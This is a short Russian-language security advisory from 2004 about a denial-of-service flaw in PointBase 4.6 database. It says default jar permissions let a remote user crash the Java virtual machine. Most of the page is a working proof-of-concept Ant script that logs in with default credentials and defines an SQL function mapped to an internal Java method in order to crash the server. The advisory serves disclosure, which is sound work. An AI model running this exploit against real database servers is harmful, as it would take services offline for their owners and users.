DoS против базы данных PointBase
| Дата публикации: | 25.01.2004 |
| Всего просмотров: | 1642 |
| Опасность: | Средняя |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: PointBase 4.6
Описание: Уязвимость обнаружена в базе данных PointBase. Удаленный пользователь может аварийно завершить работу целевой системы, на которой запущен PointBase. В конфигурации по умолчанию PointBase на все jar файлы установлены все разрешения. В результате удаленный пользователь может представить специально обработанную PointBase команду, чтобы завершить работу основной виртуальной Java машины. Пример/Эксплоит:
.(.!-- pointbase denial-of-service by marc schoenefeld --".).
.(.project default="dos".).
.(.property name="host" value="192.168.0.7"/.).
.(.target name="dos".).
.(.sql
driver="com.pointbase.jdbc.jdbcUniversalDriver"
url="jdbc:pointbase://${host}:9092/sample"
userid="pbpublic"
password="pbpublic"
print="true"
.).
.(.![CDATA[
//DROP FUNCTION CRASH5(VARCHAR(20));
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER STYLE SQL;
SELECT CRASH5(null) from SYSUSERS;
]].).
.(.classpath.).
.(.pathelement location="pbclient.jar"/.).
.(./classpath.).
.(./sql.).
.(./target.).
.(./project.).
URL производителя: http://www.pointbase.com/node.shtml?navHier=Products/Products+Overview&CF=products/overview.jsp Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | Proof-Of-Concept Denial-Of-Service Pointbase 4.6 Java SQL-DB |